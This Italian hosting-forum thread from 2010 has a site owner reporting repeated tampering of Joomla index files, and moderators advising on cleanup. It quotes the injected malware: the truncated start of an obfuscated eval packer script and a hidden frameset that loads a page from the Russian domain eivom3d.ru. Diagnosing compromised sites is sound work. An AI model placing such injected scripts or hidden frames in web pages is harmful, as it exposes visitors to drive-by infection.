LinkBack URL
About LinkBacksSegnalo che per la seconda volta nel giro di un mese il sito che gestisco ha avuto problemi dovuti all'alterazione dei file index.php e index.htm presenti nell'intera struttura del sito.
le modifiche risultano effettuate tutte allo stesso orario... questa volta ha comportato l'aggiunta del seguente script nel file pmweb.altervista.org/jom/index.php:
<script>eval(function(p,a,c,k,e,d){e=function(c){r eturn(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return........
ecc. ecc...
Questa volta il file alterato era uno solo ed ho risolto rapidamente... la volta precedente erano una ventina (tutti gli index.php e gli index.htm), ma Altervista non dovrebbe provvedere a proteggere i file presenti sui suoi server da queste alterazioni?
il sito è su http://pmweb.altervista.org/jom/index.php
Visualizzazione risultati 1 fino 7 di 7
Discussione: index.php di nuovo alterato
-
25-03-2010, 16.22.54 #1Guest
index.php di nuovo alterato
-
25-03-2010, 16.41.25 #2
Sëniör Stäff
- Data registrazione
- 06-12-2002
- Residenza
- Torino
- Messaggi
- 8,715
Controlla bene alla ricerca di virus e malware il PC tuo e di chiunque abbia eventualmente l'accesso al sito. A volte i problemi possono arrivare da dove non ti aspetti.
«È una mia peculiarità distorcere la verità e inventarne di nuove.»
«I tuoi orientamenti hanno su di me un effetto prossimo allo zero.»
-
25-03-2010, 16.45.33 #3
Super Moderatore
- Data registrazione
- 18-04-2007
- Residenza
- Reggiolo (RE)
- Messaggi
- 6,552
Assicurati inoltre di avere l'ultima versione di joomla e di eventuali moduli.
PS: dentro l'index.html della directory logs c'è un iframe nascosto.
Codice HTML:<html><body bgcolor="#FFFFFF"><Frameset rows=',100%'> <frame src='nash_script.php'><frame src="http://eivom3d.ru/flash/index.php"></frameset></body></html>
Ultima modifica di darkwolf : 25-03-2010 alle ore 16.49.19
» Salvatore Noschese - L'AltroWeb | Seguimi su: facebook | twitter | Google+
# Che aspetti? Unisciti alla community! Tanti nuovi gruppi ti aspettano
-
25-03-2010, 16.52.00 #4Guest
joomla è 1.5.15.. tutte le password per l'amministrazione del sito le ho solo io..e le cambio spesso... c'è qualcosa che non va su altervista perchè i file vengono tutti alterati nello stesso istante...
-
25-03-2010, 16.54.06 #5
Staff AV
- Data registrazione
- 24-08-2008
- Residenza
- PU / BO
- Messaggi
- 22,222
l'hai fatto?
Originalmente inviato da saitfainder
regolamento altervista_______________ regolamento forum
-
25-03-2010, 16.55.36 #6
Sëniör Stäff
- Data registrazione
- 06-12-2002
- Residenza
- Torino
- Messaggi
- 8,715
Potrebbe anche essere, ma in quel caso il tuo non sarebbe un caso isolato. Originalmente inviato da pmweb
«È una mia peculiarità distorcere la verità e inventarne di nuove.»
«I tuoi orientamenti hanno su di me un effetto prossimo allo zero.»
-
25-03-2010, 16.56.34 #7
Super Moderatore
- Data registrazione
- 18-04-2007
- Residenza
- Reggiolo (RE)
- Messaggi
- 6,552
Se così fosse non saresti l'unico ad avere simili problemi. Originalmente inviato da pmweb
C'è qualcosa che non va sul tuo pc (un malware che cattura la password ftp e quindi la usa per infettare il sito) o un bug sullo script (non è la prima volta che utenti joomla accusano simili problemi) e/o di qualche suo modulo/plugin.
Per iniziare potresti provare a controllare per bene il tuo pc; cambiare la password e ripulire eventuali infezioni (come quella da me precedentemente indicata) del sito.
-
Data "l'infezione" potrebbe anche essere stata caricata un shell.Ultima modifica di darkwolf : 25-03-2010 alle ore 16.57.51
» Salvatore Noschese - L'AltroWeb | Seguimi su: facebook | twitter | Google+
# Che aspetti? Unisciti alla community! Tanti nuovi gruppi ti aspettano
